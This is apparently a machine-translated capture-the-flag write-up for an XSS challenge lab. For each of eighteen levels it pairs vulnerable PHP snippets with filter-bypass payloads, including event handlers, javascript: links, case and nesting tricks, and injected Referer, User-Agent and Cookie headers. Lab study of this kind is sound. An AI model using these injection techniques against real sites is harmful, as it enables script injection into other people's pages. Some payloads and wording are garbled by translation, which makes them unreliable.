XSS Challenge Tour
level 1
There is no filtering
payload:
<script>alert(1)</script>
level 2
php key code:
echo "<h2 align=center>And not found".htmlspecialchars($str)."Relevant results.</h2>".'<center> <input name=keyword value="'.$str.'">
Analysis:
str is a controllable variable, the above line is materialized and hopeless.
The second line of code is not filtered, just close the input tag.
payload:
"><script>alert(1)</script>&submit=search
level 3
Key Code:
<input name=keyword value='".htmlspecialchars($str)."'>
Analysis:
html is materialized, so tags can't be used, events from js can be used to trigger xss, and single quotes can be used when closing.
payload:
'> onmouseover=alert(1) b='&submit=search
level 4
Key Code:
$str = $_GET["keyword"]; $str2=str_replace(">","",$str); $str3=str_replace("<","",$str2); <input name=keyword value="'.$str3.'">
Analysis:
Get keyword, leave the angle brackets blank, still use js events, and close with double quotes.
payload:
aa" onmouseover=alert(1) b="
level 5
Key Code:
$str = strtolower($_GET["keyword"]); $str2=str_replace("<script","<scr_ipt",$str); $str3=str_replace("on","o_n",$str2); <input name=keyword value="'.$str3.'">
Analysis:
First converts keyword to lowercase, then destroys script and on.
Use the js protocol of tag a to trigger xss.After submitting, click on that connection to trigger it.
payload:
"><a href="javascript:alert(1)">
level 6
Key Code:
$str = $_GET["keyword"]; $str2=str_replace("<script","<scr_ipt",$str); $str3=str_replace("on","o_n",$str2); $str4=str_replace("src","sr_c",$str3); $str5=str_replace("data","da_ta",$str4); $str6=str_replace("href","hr_ef",$str5); <input name=keyword value="'.$str6.'">
Analysis:
Similar to level 5, script,on,src,data,href, etc. are filtered, but there is no case conversion, so case mixing can be used to bypass them.
payload:
"><a Href="javascript:alert(1)"> "><img Src=x Onerror=alert(1)>
level 7
Key Code:
$str =strtolower( $_GET["keyword"]); $str2=str_replace("script","",$str); $str3=str_replace("on","",$str2); $str4=str_replace("src","",$str3); $str5=str_replace("data","",$str4); $str6=str_replace("href","",$str5); <input name=keyword value="'.$str6.'">
Analysis
Lowercase conversion was performed, and script,on,src,data,href, and so on were filtered.
Word nesting can be used to bypass, for example, script can be written as scrSCRIPTipt
payload:
"><scscriptript>alert(1)</scrscriptipt>
level 8
Key Code:
$str = strtolower($_GET["keyword"]); $str2=str_replace("script","scr_ipt",$str); $str3=str_replace("on","o_n",$str2); $str4=str_replace("src","sr_c",$str3); $str5=str_replace("data","da_ta",$str4); $str6=str_replace("href","hr_ef",$str5); $str7=str_replace('"','"',$str6); echo '<center><BR><a href="'.$str7.'">Friendly Links</a></center>';
Analysis
The filter is almost the same as before, plus double quotation marks.
Similar to the fifth level, you can use the js protocol.But because script is filtered, entity encoding is needed to filter.
For javascript:alert(1) Encoding
payload:
javascript:alert(1)
Tip:
Encoding python code:
def unicodeHtml(self, orgCode): self.enCode['unicodeHtml'] = ';'.join( '&#{}'.format(ord(x)) for x in orgCode)
Harvest
Other cousins on the Internet said they could bypass it like this:
You can use empty characters, spaces, TAB line breaks, comments, special functions to separate code for filtering, for example:
javas%09cript:alert() javas%0acript:alert() javas%0dcript:alert() %09:tab %0a:linefeed(Line Break) %0d:creturn
But I tried:
em~Fans, we searched before we knew it wasHttpd.confConfiguration issues.
<Directory /> Options FollowSymLinks AllowOverride None Order deny,allow Deny from all </Directory>
Replace this paragraph with:
<Directory /> Options Indexes FollowSymLinks AllowOverride None </Directory>
em~There's nothing to change, maybe it's my environmental problem speaker.Occupy a hole.
level 9
Key Code:
$str = strtolower($_GET["keyword"]); $str2=str_replace("script","scr_ipt",$str); $str3=str_replace("on","o_n",$str2); $str4=str_replace("src","sr_c",$str3); $str5=str_replace("data","da_ta",$str4); $str6=str_replace("href","hr_ef",$str5); $str7=str_replace('"','"',$str6); <?php if(false===strpos($str7,'http://')) { echo '<center><BR><a href="Is your link illegal?Is there any!">Friendly Links</a></center>'; } else { echo '<center><BR><a href="'.$str7.'">Friendly Links</a></center>'; }
Analysis
Daily filtering, unlawful if keyword does not contain http://Add it after encoding.
payload:
javascript:alert(1) //http://
level 10
Key Code:
$str = $_GET["keyword"]; $str11 = $_GET["t_sort"]; $str22=str_replace(">","",$str11); $str33=str_replace("<","",$str22); echo "<h2 align=center>And not found".htmlspecialchars($str)."Relevant results.</h2>".'<center> <input name="t_sort" value="'.$str33.'" type="hidden">
Analysis
The keyword parameter is not used because the str variable is passed in and then directly materialized and output.
It is found that you can also pass a t_sort parameter and simply filter the angle brackets, so close it and use the js event.
However, we found that the label for the t_sort value is hidden, so we changed it to visible here.
payload:
" onmouseover=alert(1) type="text" // <!--Visit:/level10.php?keyword=well%20done!&t_sort=" onmouseover=alert(1) type="text" //-->
level 11
Key Code:
$str = $_GET["keyword"]; $str00 = $_GET["t_sort"]; $str11=$_SERVER['HTTP_REFERER']; $str22=str_replace(">","",$str11); $str33=str_replace("<","",$str22); echo "<h2 align=center>And not found".htmlspecialchars($str)."Relevant results.</h2>".'<center> <input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden"> <input name="t_ref" value="'.$str33.'" type="hidden">
Analysis
Both keyword and t_sort are materialized, and they are useless.
A $_SERVER['HTTP_REFERER'] appears here
This variable just filters the angle brackets, so how does this variable get in?
You can change the package by grabbing the package:
payload:
burpsuite is used here to implement package modification
Add a: Referer:'onmouseover=alert(1) type='text'//
Then click forward.
level 12
Key Code:
$str = $_GET["keyword"]; $str00 = $_GET["t_sort"]; $str11=$_SERVER['HTTP_USER_AGENT']; $str22=str_replace(">","",$str11); $str33=str_replace("<","",$str22); <input name="t_ua" value="'.$str33.'" type="hidden">
Analysis
Similar to what just happened, it's also about changing your package.
payload:
Change the value of User-Agent to "onmouseover=alert(1) type="text "//
level 13
Key Code:
setcookie("user", "call me maybe?", time()+3600); ini_set("display_errors", 0); $str = $_GET["keyword"]; $str00 = $_GET["t_sort"]; $str11=$_COOKIE["user"]; $str22=str_replace(">","",$str11); $str33=str_replace("<","",$str22); <input name="t_cook" value="'.$str33.'" type="hidden">
Analysis
Grab a bag, change cookie s
payload:
Cookie: user=" onmouseover=alert(1) type="text" //
level 14
Not very clear, there is an answer in the last reference.
level 15
Key Code:
<script src="https://cdn.staticfile.org/angular.js/1.4.6/angular.min.js"></script> $str = $_GET["src"]; echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
Analysis
Looking at the analysis of the big guys, I know this is using the Angular JS ng-include directive.
The ng-include directive is used to contain external HTML files.
The content contained will act as a child node of the specified element.
The value of the ng-include property can be an expression that returns a file name.
By default, the included files need to be contained under the same domain name.
When you visit/level15.php?src='level1.php', you will introduce the file of Level 6 to this page:
So we can take advantage of payload s we've used before, like Level 1.
payload:
/level15.php?src='level1.php?name=<img src=1 onerror=alert(1)>'
level 16
Key Code:
$str = strtolower($_GET["keyword"]); $str2=str_replace("script"," ",$str); $str3=str_replace(" "," ",$str2); $str4=str_replace("/"," ",$str3); $str5=str_replace(" "," ",$str4); echo "<center>".$str5."</center>";
Analysis
Use:%0d%0a to separate
payload:
<img%0Dsrc=1%0Donerror=alert(1)>
level 17
Key Code:
echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
Analysis
html instantiation, triggered via on.
payload:
%20onmouseover=alert(1)
Source code after execution:
<embed src=xsf01.swf?a= onmouseover=alert(1) width=100% heigth=100%><h2 align=center>After success,<a href=level18.php?arg01=a&arg02=b>Click on me to enter the next level</a></h2>
level 18
Key Code:
echo "<embed src=xsf02.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
Analysis
It feels like 17.
payload:
%20onmouseover=alert(1)
19 and 20 won't.
Reference resources:
XSS Challenge Tour (1~10)
https://www.jianshu.com/p/550529813397
XSS Challenge Tour--Game Breakout
https://www.jianshu.com/p/4e3a517bc4ea
Dwarf on Giant's Shoulder XSS Challenge Trip - Game Solutions (Update to Level 18)
https://xz.aliyun.com/t/1206?accounttraceid=74ab404d-2a01-4a1c-8b87-36ad367dbe11#toc-12